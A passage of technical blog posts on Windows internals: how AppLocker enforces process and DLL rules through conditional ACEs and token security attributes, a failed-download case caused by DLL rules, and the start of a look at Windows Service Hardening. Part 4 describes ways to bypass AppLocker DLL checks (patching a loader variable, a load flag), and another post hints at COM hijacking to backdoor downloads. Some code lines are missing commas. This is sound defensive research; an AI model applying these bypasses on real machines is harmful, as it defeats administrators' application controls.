To do the test we'll need to install my NtObjectManager PowerShell module. We'll use the module more going forward so might as well install it now. To do that follow this procedure on the VM we setup last time:
  1. In an administrator PowerShell console, run the command 'Install-Module NtObjectManager'. Running this command as an admin allows the module to be installed in Program Files which is one of the permitted locations for Everyone in part 1's sample rules.
  2. Set the system execution policy to unrestricted from the same PowerShell window using the command 'Set-ExecutionPolicy -ExecutionPolicy Unrestricted'. This allows unsigned scripts to run for all users.
  3. Log in as the non-admin user, otherwise nothing will be enforced.
  4. Start a PowerShell console and ensure you can load the NtObjectManager module by running 'Import-Module NtObjectManager'. You shouldn't see any errors.
From part 1 you should already have an executable in the Desktop folder which if you run it it'll be blocked by policy (if not copy something else to the desktop, say a copy of NOTEPAD.EXE).

Now run the following three commands in the PowerShell windows. You might need to adjust the executable path as appropriate for the file you copied (and don't forget the \?? prefix).

$path = "\??\C:\Users\$env:USERNAME\Desktop\notepad.exe"
$sect = New-NtSectionImage -Path $path
$p = [NtApiDotNet.NtProcess]::CreateProcessEx($sect)
Get-NtStatus $p.ExitStatus

After the call to Get-NtStatus it should print that the current exit code for the process is STATUS_PENDING. This is an indication that the process is alive, although at the moment we don't have any code running in it. Now create a new thread in the process using the following:

[NtApiDotNet.NtThread]::Create($p00"Suspended"4096)
Get-NtStatus $p.ExitStatus

After calling NtThread::Create you should receive an big red exception error and the call to Get-NtStatus should now show that the process returned error. To make it more clear I've reproduced the example in the following screenshot:

Screenshot of PowerShell showing the process creation and error when a thread is added.

That's all for this post. Of course there's still a few big mysteries to solve, why does AiGetTokens return two token handles, what is AiSetAttributesExe doing and how does SrppAccessCheck verify the policy through an access check? Find out next time.


The Internals of AppLocker - Part 3 - Access Tokens and Access Checking

This is part 3 in a short series on the internals of AppLocker (AL). Part 1 is here, part 2 here and part 4 here.

In the last part I outlined how process creation is blocked with AL. I crucially left out exactly how the rules are processed to determine if a particular user was allowed to create a process. As it makes more sense to do so, we're going to go in reverse order from how the process was described in the last post. Let's start with talking about the access check implemented by SrppAccessCheck.

Access Checking and Security Descriptors

For all intents the SrppAccessCheck function is just a wrapper around a specially exported kernel API SeSrpAccessCheck. While the API has a few unusual features for this discussion might as well assume it to be the normal SeAccessCheck API. 

A Windows access check takes 4 main parameters:
  • SECURITY_SUBJECT_CONTEXT which identifies the caller's access tokens.
  • A desired access mask.
  • A GENERIC_MAPPING structure which allows the access check to convert generic access to object specific access rights.
  • And most importantly, the Security Descriptor which describes the security of the resource being checked.
Let's look at some code.

NTSTATUS SrpAccessCheckCommon(HANDLE TokenHandle, BYTE* Policy) {
    
    SECURITY_SUBJECT_CONTEXT Subject = {};
    ObReferenceObjectByHandle(TokenHandle, &Subject.PrimaryToken);
    
    DWORD SecurityOffset = *((DWORD*)Policy+4)
    PSECURITY_DESCRIPTOR SD = Policy + SecurityOffset;
    
    NTSTATUS AccessStatus;
    if (!SeSrpAccessCheck(&Subject, FILE_EXECUTE
                          &FileGenericMapping, 
                          SD, &AccessStatus) &&
        AccessStatus == STATUS_ACCESS_DENIED) {
        return STATUS_ACCESS_DISABLED_BY_POLICY_OTHER;
    }
    
    return AccessStatus;
}

The code isn't very complex, first it builds a SECURITY_SUBJECT_CONTEXT structure manually from the access token passed in as a handle. It uses a policy pointer passed in to find the security descriptor it wants to use for the check. Finally a call is made to SeSrpAccessCheck requesting file execute access. If the check fails with an access denied error it gets converted to the AL specific policy error, otherwise any other success or failure is returned.

The only thing we don't really know in this process is what the Policy value is and therefore what the security descriptor is. We could trace through the code to find how the Policy value is set , but sometimes it's just easier to breakpoint on the function of interest in a kernel debugger and dump the pointed at memory. Taking the debugging approach shows the following:

WinDBG window showing the hex output of the policy pointer which shows the on-disk policy.

Well, what do we have here? We've seen those first 4 characters before, it's the magic signature of the on-disk policy files from part 1. SeSrpAccessCheck is extracting a value from offset 16, which is used as an offset into the same buffer to get the security descriptor. Maybe the policy files already contain the security descriptor we seek? Writing some quick PowerShell I ran it on the Exe.AppLocker policy file to see the result:

PowerShell console showing the security output by the script from Exe.Applocker policy file.

Success, the security descriptor is already compiled into the policy file! The following script defines two functions, Get-AppLockerSecurityDescriptor and Format-AppLockerSecurityDescriptor. Both take a policy file as input and returns either a security descriptor object or formatted representation:

If we run Format-AppLockerSecurityDescriptor on the Exe.Applocker file we get the following output for the DACL (trimmed for brevity):

 - Type  : AllowedCallback
 - Name  : Everyone
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: APPID://PATH Contains "%WINDIR%\*"

 - Type  : AllowedCallback
 - Name  : BUILTIN\Administrators
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: APPID://PATH Contains "*"

 - Type  : AllowedCallback
 - Name  : Everyone
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: APPID://PATH Contains "%PROGRAMFILES%\*"

 - Type  : Allowed
 - Name  : APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES
 - Access: Execute|ReadAttributes|ReadControl|Synchronize

 - Type  : Allowed
 - Name  : APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES
 - Access: Execute|ReadAttributes|ReadControl|Synchronize

We can see we have two ACEs which are for the Everyone group and one for the Administrators group. This matches up with the default configuration we setup in part 1. The last two entries are just there to ensure this access check works correctly when run from an App Container.

The most interesting part is the Condition field. This is a rarely used (at least for consumer version of the OS) feature of the security access checking in the kernel which allows a conditional expression evaluated to determine if an ACE is enabled or not. In this case we're seeing the SDDL format (documentation) but under the hood it's actually a binary structure. If we assume that the '*' acts as a globbing character then again this matches our rules, which let's remember:
  • Allow Everyone group access to run any executable under %WINDIR% and %PROGRAMFILES%.
  • Allow Administrators group to run any executable from anywhere.
This is how AL's rules are enforced. When you configure a rule you specify a group, which is added as the SID in an ACE in the policy file's Security Descriptor. The ACE type is set to either Allow or Deny and then a condition is constructed which enforces the rule, whether it be a path, a file hash or a publisher.

In fact let's add policy entries for a hash and publisher and see what condition is set for them. Download a new policy file from this link and run the Set-AppLockerPolicy command in an admin PowerShell console. Then re-run Format-ApplockerSecurityDescriptor:

 - Type  : AllowedCallback
 - Name  : Everyone
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: (Exists APPID://SHA256HASH) && (APPID://SHA256HASH Any_of {#5bf6ccc91dd715e18d6769af97dd3ad6a15d2b70326e834474d952753
118c670})

 - Type  : AllowedCallback
 - Name  : Everyone
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Flags : None
 - Condition: (Exists APPID://FQBN) && (APPID://FQBN >= {"O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\MICROSOFT® WINDOWS
® OPERATING SYSTEM\*", 0})

We can now see the two new conditional ACEs, for a SHA256 hash and the publisher subject name. Basically rinse and repeat as more rules and conditions are added to the policy they'll be added to the security descriptor with the appropriate ACEs. Note that the ordering of the rules are very important, for example Deny ACEs will always go first. I assume the policy file generation code correctly handles the security descriptor generation, but you can now audit it to make sure.

While we now understand how the rules are enforced, where does the values for the condition, such as APPID://PATH come from? If you read the (poor) documentation about conditional ACEs you'll find these values are Security Attributes. The attributes can be either globally defined or assigned to an access token. Each attribute has a name, then a list of one or more values which can be strings, integers, binary blobs etc. This is what AL is using to store the data in the access check token.

Let's go back a step and see what's going on with AiSetAttributesExe to see how these security attributes are generated.

Setting Token Attributes

The AiSetAttributesExe function takes 4 parameters:
  • A handle to the executable file.
  • Pointer to the current policy.
  • Handle to the primary token of the new process.
  • Handle to the token used for the access check.
The code isn't doesn't look very complex, initially:

NTSTATUS AiSetAttributesExe(
            PVOID Policy, 
            HANDLE FileHandle, 
            HANDLE ProcessToken, 
            HANDLE AccessCheckToken) {
  
    PSECURITY_ATTRIBUTES SecAttr;
    AiGetFileAttributes(Policy, FileHandle, &SecAttr);
    NTSTATUS status = AiSetTokenAttributes(ProcessToken, SecAttr);
    if (NT_SUCCESS(status) && ProcessToken != AccessCheckToken)
        status = AiSetTokenAttributes(AccessCheckToken, SecAttr);
    return status;
}

All the code does it call AiGetFileAttributes, which fills in a SECURITY_ATTRIBUTES structure, and then calls AiSetTokenAttributes to set them on the ProcessToken and the AccessCheckToken (if different). AiSetTokenAttributes is pretty much a simple wrapper around the exported (and undocumented) kernel API SeSetSecurityAttributesToken which takes the generated list of security attributes and adds them to the access token for later use in the access check.

The first thing AiGetFileAttributes does is query the file handle for it's full path, however this is the native path and takes the form \Device\Volume\Path\To\File. A path of this form is pretty much useless if you wanted to generate a single policy to deploy across an enterprise, such as through Group Policy. Therefore the code converts it back to a Win32 style path such as c:\Path\To\File. Even then there's no guarantee that the OS drive is C:, and what about wanting to have executables on USB keys or other removable drives where the letter could change?

To give the widest coverage the driver also maintains a fixed list of "Macros" which look like Environment variable expansions. These are used to replace the OS drive components as well as define placeholders for removable media. We already saw them in use in the dump of the security descriptor with string components like "%WINDIR%". You can find a list of the macros here, but I'll reproduce them here:
  • %WINDIR% - Windows Folder.
  • %SYSTEM32% - Both System32 and SysWOW64 (on x64).
  • %PROGRAMFILES% - Both Program Files and Program Files (x86).
  • %OSDRIVE% - The OS install drive.
  • %REMOVABLE% - Removable drive, such a CD or DVD.
  • %HOT% - Hot-pluggable devices such as USB keys.
Note that SYSTEM32 and PROGRAMFILES will map to either 32 or 64 bit directories when running on a 64 bit system (and presumably also ARM directories on ARM builds of Windows?). If you want to pick a specific directory you'll have to configure the rules to not use the macros.

To hedge its bets AL puts every possible path configuration, native path, Win32 path and all possible macroed paths as string values in the APPID://PATH security attribute.

AiGetFileAttributes continues, gathering the publisher information for the file. On Windows 10 the signature and certificate checking is done in multiple ways, first checking the kernel Code Integrity module (CI), then doing some internal work and finally falling back to calling over RPC to the running APPIDSVC. The information, along with the version number of the binary is put into the APPID://FQBN attribute, which stands for Fully Qualified Binary Name.

The final step is generating the file hash, which is stored in a binary blob attribute. AL supports three hash algorithms with the following attribute names:
  • APPID://SHA256HASH - Authenticode SHA256.
  • APPID://SHA1HASH - Authenticode SHA1
  • APPID://SHA256FLATHASH - SHA256 over entire file.
As the attributes are applied to both tokens we should be able to see them on the primary token of a normal user process. By running the following PowerShell command we can see the added security attributes on the current process token.

PS> $(Get-NtToken).SecurityAttributes | ? Name -Match APPID

Name       : APPID://PATH
ValueType  : String
Flags      : NonInheritable, CaseSensitive
Values     : {
   %SYSTEM32%\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE,
   %WINDIR%\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE,  
    ...}

Name       : APPID://SHA256HASH
ValueType  : OctetString
Flags      : NonInheritable
Values     : {133 66 87 106 ... 85 24 67}

Name       : APPID://FQBN
ValueType  : Fqbn
Flags      : NonInheritable, CaseSensitive
Values     : {Version 10.0.18362.1 - O=MICROSOFT CORPORATION, ... }


Note that the APPID://PATH attribute is always added, however APPID://FQBN and APPID://*HASH are only generated and added if there are rules which rely on them.

The Mystery of the Twin Tokens

We've come to the final stage, we now know how the security attributes are generated and applied to the two access tokens. The question now is why is there two tokens, the process token and one just for access checking?

Everything happens inside AiGetTokens, which is shown in a simplified form below:


NTSTATUS AiGetTokens(HANDLE ProcessId,

PHANDLE ProcessToken,

PHANDLE AccessCheckToken)

{

  AiOpenTokenByProcessId(ProcessId, &TokenHandle);

  NTSTATUS status = STATUS_SUCCESS;
  *Token = TokenHandle;
  if (!AccessCheckToken)
    return STATUS_SUCCESS;

  BOOL IsRestricted;
  status = ZwQueryInformationToken(TokenHandle, TokenIsRestricted, &IsRestricted);
  DWORD ElevationType;
  status = ZwQueryInformationToken(TokenHandle, TokenElevationType,
&ElevationType);

  HANDLE NewToken = NULL;
  if (ElevationType != TokenElevationTypeFull)
      status = ZwQueryInformationToken(TokenHandle, TokenLinkedToken,
&NewToken);

  if (!IsRestricted
    || NT_SUCCESS(status)
    || (status = SeGetLogonSessionToken(TokenHandle, 0,
&NewToken), NT_SUCCESS(status))
    || status == STATUS_NO_TOKEN) {
    if (NewToken)
      *AccessCheckToken = NewToken;
    else
      *AccessCheckToken = TokenHandle;
  }

  return status;
}

Let's summarize what's going on. First, the easy one, the ProcessToken handle is just the process token opened from the process, based on its PID. If the AccessCheckToken is not specified then the function ends here. Otherwise the AccessCheckToken is set to one of three values
  1. If the token is a non-elevated (UAC) token then use the full elevated token.
  2. If the token is 'restricted' and not a UAC token then use the logon session token.
  3. Otherwise use the primary token of the new process.
We can now understand why a non-elevated UAC admin has Administrator rules applied to them. If you're running as the non-elevated user token then case 1 kicks in and sets the AccessCheckToken to the full administrator token. Now any rule checks which specify the Administrators group will pass.

Case 2 is also interesting, a "restricted" token in this case is one which has been passed through the CreateRestrictedToken API and has restricted SIDs attached. This is used by various sandboxes especially Chromium's (and by extension anyone who uses it such as Firefox). Case 2 ensures that if the process token is restricted and therefore might not pass the access check, say the Everyone group is disabled, then the access check is done instead against the logon session's token, which is the master token from which all others are derived in a logon session.

If nothing else matches then case 3 kicks in and just assigns the primary token to the AccessCheckToken. There are edges cases in these rules. For example you can use CreateRestrictedToken to create a new access token with disabled groups, but which doesn't have restricted SIDs. This results in case 2 not being applied and so the access check is done against the limited token which could very easily fail to validate causing the process to be terminated.

There's also a more subtle edge case here if you look back at the code. If you create a restricted token of a UAC admin token then process creation typically fails during the policy check. When the UAC token is a full admin token the second call to ZwQueryInformationToken will not be made which results in NewToken being NULL. However in the final check, IsRestricted is TRUE so the second condition is checked, as status is STATUS_SUCCESS (from the first call to ZwQueryInformationToken) this passes and we enter the if block without ever calling SeGetLogonSessionToken. As NewToken is still NULL AccessCheckToken is set to the primary process token which is the restricted token which will cause the subsequent access check to fail. This is actually a long standing bug in Chromium, it can't be run as UAC admin if AppLocker is enforced.

That's the end of how AL does process enforcement. Hopefully it's been helpful. Next time I'll dig into how DLL enforcement works.

Locking Resources to Specific Processes

Before we go, here's a silly trick which might now be obvious. Ever wanted to restrict access to resources, such as files, to specific processes? With the AL applied security attributes now you can. All you need to do is apply the same conditional ACE syntax to your file and the kernel will do the enforcement for you. For example create the text file C:\TEMP\ABC.TXT, now to only allow notepad to open it do the following in PowerShell:

Set-NtSecurityDescriptor \??\C:\TEMP\ABC.TXT `
     -SecurityDescriptor 'D:(XA;;GA;;;WD;(APPID://PATH Contains "%SYSTEM32%\NOTEPAD.EXE"))' `
     -SecurityInformation Dacl

Make sure that the path is in all upper case. You should now find that while PowerShell (or any other application) can't open the text file you can open and modify it just fine in notepad. Of course this won't work across network boundaries and is pretty easy to get around, but that's not my problem ;-)



The Internals of AppLocker - Part 4 - Blocking DLL Loading

This is part 4 in a short series on the internals of AppLocker (AL). Part 1 is here, part 2 here and part 3 here. As I've mentioned before this is how AL works on Windows 10 1909, it might differ on other versions of Windows.

In the first three parts of this series I covered the basics of how AL blocked process creation. We can now tackle another, optional component, blocking DLL loading. If you dig into the Group Policy Editor for Windows you will find a fairly strong warning about enabling DLL rules for AL:

Warning text on DLL rules staying that enabling them could affect system performance.

It seems MS doesn't necessarily recommend enabling DLL blocking rules, but we'll dig in anyway as I can't find any official documentation on how it works and it's always interesting to better understand how something works before relying on it.

We know from the part 1 that there's a policy for DLLs in the DLL.Applocker file. We might as well start with dumping the Security Descriptor from the file using the Format-AppLockerSecurityDescriptor function from part 3, to check it matches our expectations. The DACL is as follows:

 - Type  : AllowedCallback
 - Name  : Everyone
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: APPID://PATH Contains "%WINDIR%\*"

 - Type  : AllowedCallback
 - Name  : Everyone
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: APPID://PATH Contains "%PROGRAMFILES%\*"

 - Type  : AllowedCallback
 - Name  : BUILTIN\Administrators
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: APPID://PATH Contains "*"

 - Type  : Allowed
 - Name  : APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES
 - Access: Execute|ReadAttributes|ReadControl|Synchronize

 - Type  : Allowed
 - Name  : APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES
 - Access: Execute|ReadAttributes|ReadControl|Synchronize

Nothing shocking here, just our rules written out in a security descriptor. However it gives us a hint that perhaps some of the enforcement is being done inside the kernel driver. Unsurprisingly if you look at the names in APPID you'll find a function called SrpVerifyDll. There's a good chance that's our target to investigate.

By chasing references you'll find the SrpVerifyDll function being called via a Device IO control code to an device object exposed by the APPID driver (\Device\SrpDevice). I'll save you the effort of reverse engineering, as it's pretty routine. The control code and input/output structures are as follows:

// 0x225804
#define IOCTL_SRP_VERIFY_DLL CTL_CODE(FILE_DEVICE_UNKNOWN, 1537, \
            METHOD_BUFFERED, FILE_READ_DATA)

struct SRP_VERIFY_DLL_INPUT {
    ULONGLONG FileHandle;
    USHORT FileNameLength;
    WCHAR FileName[ANYSIZE_ARRAY];
};

struct SRP_VERIFY_DLL_OUTPUT {
    NTSTATUS VerifyStatus;
};

Looking at SrpVerifyDll itself there's not much to really note. It's basically very similar to the verification done for process creation I described in detail in part 2 and 3:
  1. An access check token is captured and duplicated. If the token is restricted query for the logon session token instead.
  2. The token is checked whether it can bypass policy by being SANDBOX_INERT or a service.
  3. Security attributes are gathered using AiGetFileAttributes on the passed in file handle.
  4. Security attributes set on token using AiSetTokenAttributes.
  5. Access check performed using policy security descriptor and status result written back to the Device IO Control output.
It makes sense the the security attributes have to be recreated as the access check needs to know the information about the DLL being loaded not the original executable. Even though a file name is passed in the input structure as far as I can tell it's only used for logging purposes.

There is one big difference in step 1 where the token is captured over the one I documented in part 3. In process blocking if the current token was a non-elevated UAC token then the code would query for the full elevated token and use that to do the access check. This means that even if you were creating a process as the non-elevated user the access check was still performed as if you were an administrator. In DLL blocking this step does not take place, which can lead to a weird case of being able to create a process in any location, but not being able to load any DLLs in the same directory with the default policy. I don't know if this is intentional or Microsoft just don't care?

Who calls the Device IO Control to verify the DLL? To save me some effort I just set a breakpoint on SrpVerifyDll in the kernel debugger and then dumped the stack to find out the caller:

Breakpoint 1 hit
appid!SrpVerifyDll:
fffff803`38cff100 48895c2410      mov qword ptr [rsp+10h],rbx
0: kd> kc
 # Call Site
00 appid!SrpVerifyDll
01 appid!AipDeviceIoControlDispatch
02 nt!IofCallDriver
03 nt!IopSynchronousServiceTail
04 nt!IopXxxControlFile
05 nt!NtDeviceIoControlFile
06 nt!KiSystemServiceCopyEnd
07 ntdll!NtDeviceIoControlFile
08 ADVAPI32!SaferpIsDllAllowed
09 ADVAPI32!SaferiIsDllAllowed
0a ntdll!LdrpMapDllNtFileName
0b ntdll!LdrpMapDllFullPath
0c ntdll!LdrpProcessWork
0d ntdll!LdrpLoadDllInternal
0e ntdll!LdrpLoadDll

Easy, it's being called from the function SaferiIsDllAllowed which is being invoked from LdrLoadDll. This of course makes perfect sense, however it's interesting that NTDLL is calling a function in ADVAPI32, has MS never heard of layering violations? Let's look into LdrpMapDllNtFileName which is the last function in NTLL before the transition to ADVAPI32. The code which calls SaferiIsDllAllowed looks like the following:

NTSTATUS status;

if ((LoadInfo->LoadFlags & 0x100) == 0 
        && LdrpAdvapi32DllHandle) {
  status = LdrpSaferIsDllAllowedRoutine(
        LoadInfo->FileHandle, LoadInfo->FileName);
}

The call to SaferiIsDllAllowed  is actually made from a global function pointer. This makes sense as NTDLL can't realistically link directly to ADVAPI32. Something must be initializing these values, and that something is LdrpCodeAuthzInitialize. This initialization function is called during the loader initialization process before any non-system code runs in the new process. It first checks some registry keys, mostly importantly whether "\Registry\Machine\System\CurrentControlSet\Control\Srp\GP\DLL" has any sub-keys, and if so it proceeds to load the ADVAPI32 library using LdrLoadDll and query for the exported SaferiIsDllAllowed function. It stores the DLL handle in LdrpAdvapi32DllHandle and the function pointer 'XOR' encrypted in LdrpSaferIsDllAllowedRoutine.

Once SaferiIsDllAllowed is called the status is checked. If it's not STATUS_SUCCESS then the loader backs out and refuses to continue loading the DLL. It's worth reiterating how different this is from WDAC, where the security checks are done inside the kernel image mapping process. You shouldn't be able to even create a mapped image section which isn't allowed by policy when WDAC is enforced. However with AL loading a DLL is just a case of bypassing the check inside a user mode component.

If we look back at the calling code in LdrpMapDllNtFileName we notice there are two conditions which must be met before the check is made, the LoadFlags must not have the flag 0x100 set and LdrpAdvapi32DllHandle must be non-zero.

The most obvious condition to modify is LdrpAdvapi32DllHandle. If you already have code running (say VBA) you could use WriteProcessMemory to modify the memory location of LdrpAdvapi32DllHandle to be 0. Now any calls to LoadLibrary will not get verified and you can load any DLL you like outside of policy. In theory you might also be able to get the load of ADVAPI32 to fail. However unless LdrLoadDll returns STATUS_NOT_FOUND for the DLL load then the error causes the process to fail during initialization. As ADVAPI32 is in the known DLLs I can't see an easy way around this (I tried by renaming the main executable trick from the AMSI bypass).

The other condition, the LoadFlags is more interesting. There still exists a documented LOAD_IGNORE_CODE_AUTHZ_LEVEL flag you can pass to LoadLibraryEx which used to be able to bypass AppLocker DLL verification. However, as with SANDBOX_INERT this in theory was limited to only System and TrustedInstaller with KB2532445, although according to Stefan Kanthak it might not be blocked. That said I can't get this flag to do anything on Windows 10 1909 and tracing through LdrLoadDll it doesn't look like it's ever used. Where does this 0x100 flag come from then? Seems it's set by the LDrpDllCharacteristicsToLoadFlags function at the start of LdrLoadDll. Which looks like the following:

int LdrpDllCharacteristicsToLoadFlags(int DllCharacteristics) {
  int load_flags = 0;
  // ...
  if (DllCharacteristics & 0x1000)
    load_flags |= 0x100;
   
  return load_flags;
}

If we pass in 0x1000 as a DllCharacteristics flag (this doesn't seem to work by putting it in the DLL PE headers as far as I can tell) which is the second parameter to LdrLoadDll then the DLL will not be verified against the DLL policy. The DLL Characteristic flag 0x1000 is documented as IMAGE_DLLCHARACTERISTICS_APPCONTAINER but I don't know what API sets this flag in the call to LdrLoadDll. My original guess was LoadPackagedLibrary but that doesn't seem to be the case.

A simple PowerShell script to test this flag is below:
If you run Start-Dll "Path\To\Any.DLL" where the DLL is not in an allowed location you should find it fails. However if you run Start-Dll "Path\To\Any.DLL" 0x1000 you'll find the DLL now loads.

Of course realistically the DLL blocking is really more about bypassing the process blocking by using the DLL loader instead. Without being able to call LdrLoadDll or writing to process memory it won't be easy to bypass the DLL verification (but of course it will not impossible).

This is the last part on AL for a while, I've got to do other things. I might revisit this topic later to discuss AppX support, SmartLocker and some other fun tricks.

The Mysterious Case of a Broken Virus Scanner

On my VM (with a default Windows 10 1909) I used for my series of AppLocker I wanted to test out the new Edge.  I opened the old Edge and tried to download the canary installer, however the download failed, Edge said the installer had a virus and it'd been deleted. How rude! I also tried the download in Chrome on the same machine with the same result, even ruder!

Downloading Edge Canary in Edge with AppLocker. Shows a bar that the download has been deleted because it's a virus.

Oddly it worked if I turned off DLL Rule Enforcement, but not when I enabled it again. My immediate thought might be the virus checking was trying to map the executable and somehow it was hitting the DLL verification callback and failing as the file was in my Downloads folder which is not in the default rule set. That seemed pretty unlikely, however clearly something was being blocked from running. Fortunately AppLocker maintains an Audit Log under "Applications and Services Logs -> Microsoft -> Windows -> AppLocker -> EXE and DLL" so we can quickly diagnose the failure.

Failing DLL load in audit log showing it tried to load %OSDRIVE%\PROGRAMDATA\MICROSOFT\WINDOWS DEFENDER\PLATFORM\4.18.1910.4-0\MPOAV.DLL

The failing DLL load was for "%OSDRIVE%\PROGRAMDATA\MICROSOFT\WINDOWS DEFENDER\PLATFORM\4.18.1910.4-0\MPOAV.DLL". This makes sense, the default rules only permit %WINDOWS% and %PROGRAMFILES% for normal users, however %OSDRIVE%\ProgramData is not allowed. This is intentional as you don't want to grant access to locations a normal user could write to, so generally allowing all of %ProgramData% would be asking for trouble. [update:20191206] of course this is known about (I'm not suggesting otherwise), AaronLocker should allow this DLL by default.

I thought it'd at least be interesting to see why it fails and what MPOAV is doing. As the same failure occurred in both Edge (I didn't test IE) and Chrome it was clearly some common API they were calling. As Chrome is open source it made more sense to look there. Tracking down the resource string for the error lead me to this code. The code was using the Attachment Services API. Which is a common interface to verify downloaded files and attachments, apply MOTW and check for viruses.

When the IAttachmentExecute::Save method is called the file is checked for viruses using the currently registered anti-virus COM object which implements the IOfficeAntiVirus interface. The implementation for that COM class is in MPOAV.DLL, which as we saw is blocked so the COM object creation fails. And a failure to create the object causes the Save method to fail and the Attachment Services code to automatically delete the file so the browser can't even do anything about it such as ask the user. Ultra rude!

You might wonder how is this COM class is registered? An implementor needs to register their COM object with a Category ID of "{56FFCC30-D398-11d0-B2AE-00A0C908FA49}". If you have OleViewDotNet setup (note there are other tools) you can dump all registered classes using the following PowerShell command:

Get-ComCategory -CatId '56FFCC30-D398-11d0-B2AE-00A0C908FA49' | Select -ExpandProperty ClassEntries

On a default installation of Windows 10 you should find a single class, "Windows Defender IOfficeAntiVirus implementation" registered which is implemented in the MPOAV DLL. We can try and create the class with DLL enforcement to convince ourselves that's the problem:

PowerShell error when creating MSOAV COM object. Fails with AppLocker policy block error.

No doubt this has been documented before (and I've not looked [update:20191206] of course Hexacorn blogged about it) but you could probably COM hijack this class (or register your own) and get notified of every executable downloaded by the user's web browser. Perhaps even backdoor everything. I've not tested that however ;-)

This issue does demonstrate a common weakness with any application allow-listing solution. You've got to add a rule to allow this (probably undocumented) folder in your DLL rules. Or you could allow-list all Microsoft Defender certificates I suppose. Potentially both of these criteria could change and you end up having to fix random breakage which wouldn't be fun across a large fleet of machines. It also demonstrates a weird issue with attachment scanning, if your AV is somehow misconfigured things will break and there's no obvious reason why. Perhaps we need to move on from using outdated APIs to do this process or at least handle failure better.

Empirically Assessing Windows Service Hardening

In the past few years there's been numerous exploits for service to system privilege escalation. Primarily they revolve around the fact that system services typically have impersonation privilege. What this means is given access to a suitable token handle of an administrator (say through the Rotten Potato attack) you can impersonate and elevate from a lower-privileged service account to SYSTEM. The problem for discovers of these attacks is that Microsoft do not consider them something which needs to be fixed with a security bulletin, as having SeImpersonatePrivilege is basically a massive security hole. However MS go and fix them silently making it unclear if they care or not.

Of course, none of this is really new, Cesar Cerrudo detailed these sorts of service attacks in Token Kidnapping and Token Kidnapping's Revenge. The novel element recently is how to get hold of the access token, for example via negotiating local NTLM authentication. Microsoft seem to have been fighting this fire for almost 10 years and still have not gotten it right. In shades of UAC, a significant security push to make services more isolated and secure has been basically abandoned because (presumably) MS realized it was an indefensible boundary.

That's not to say there hasn't been interesting service account to SYSTEM bugs which Microsoft have fixed. The most recent example is CVE-2019-1322 which was independently discovered by multiple parties (DonkeysTeamIlias Dimopoulos and Edward Torkington/Phillip Langlois of NCC). To understand the bug you probably should read up one of the write-ups (NCC one here) but the gist is, the Update Orchestrator Service has a service security descriptor which allowed "NT AUTHORITY\SERVICE" full access. It so happens that all system services, including lower-privileged ones have this group and so you could reconfigure the service (which was running as SYSTEM) to point to any other binary giving a direct service to SYSTEM privilege escalation.

That begs the question, why was CVE-2019-1322 special enough to be fixed and not issues related to impersonation? Perhaps it's because this issue didn't rely on impersonate privileges being present? It is possible to configure services to not have impersonate privilege, so presumably if you could go from a non-impersonate service to an impersonate service that would count as a boundary? Again probably not, for example this bug which abuses the scheduled task service to regain impersonate privilege wouldn't likely be fixed by Microsoft.

That lack of clarity is why I tweeted to Nate Warfield and ultimately to Matt Miller asking for some advice with respect to the MSRC Security Servicing Guidelines. The result is, even if the service doesn't have impersonate privilege it wouldn't be a defended boundary if all you get is the same user with additional privileges as you can't block yourself from compromising yourself. This is the UAC argument over again, but IMO there's a crucial difference, Windows Service Hardening (WSH) was supposed to fix this problem for us in Vista. Unsurprisingly Cesar Cerrudo also did a presentation about this at the inaugural (maybe?) Infiltrate in 2011.

The question I had was, is WSH still as broken as it was in 2011? Has anything changed which made WSH finally live up to its goal of making a service compromise not equal to a full system compromise? To determine that I thought I'd run an experiment on Windows 10 1909. I'm only interested in the features which WSH touches which led me to the following hypothesis:

"Under Windows Service Hardening one service without impersonate privilege can't write to the resources of another service which does have the privilege, even if the same user, preventing full system compromise."

The hypothesis makes the assumption that if you can write to another service's resources then it's possible to compromise that other service. If that other service has SeImpersonatePrivilege then that inevitably leads to full system compromise. Of course that's not necessarily the case, the resource being written to might be uninteresting, however as a proxy this is sufficient as the goal of WSH is to prevent one service modifying the data of another even though they are the same underlying user.

WSH Details

Before going into more depth on the experiment, let's quickly go through the various features of WSH and how they're expressed. If you know all this you can skip to the description of the experiment and the results.

Limited Service Accounts and Reduced Privilege

This feature is by far the oldest attempt to harden services, the introduction of the LOCAL SERVICE (LS) and NETWORK SERVICE (NS) accounts. Prior to the accounts introduction there was only two ways of configuring the user for a system service on Windows, either the fully privileged SYSTEM account or creating a local/domain user which has the "Log on as a Service" right. The two accounts where introduced in XP SP2 (I believe) after worms such as Blaster basically got SYSTEM privilege through remotely attacking exposed services. The two service accounts are not administrator accounts which means they shouldn't be able to directly compromise the system. The accounts are very similar on Windows 10 1909, they are both assigned the following groups*:

BUILTIN\Users
CONSOLE LOGON
Everyone
LOCAL
NT AUTHORITY\Authenticated Users
NT AUTHORITY\LogonSessionId_X_Y
NT AUTHORITY\SERVICE
NT AUTHORITY\This Organization

* Technically this isn't 100% accurate, on my machine the LS account has some extra capability groups, but we'll ignore those for this blog post.

No Administrator group in sight. Each service token gets a unique Logon Session ID SID which will be important later. The service accounts also have a limited set of privileges, as shown below:

SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeSystemTimePrivilege†
SeTimeZonePrivilege
SeUndockPrivilege

† NETWORK SERVICE doesn't have SeSystemTimePrivilege.

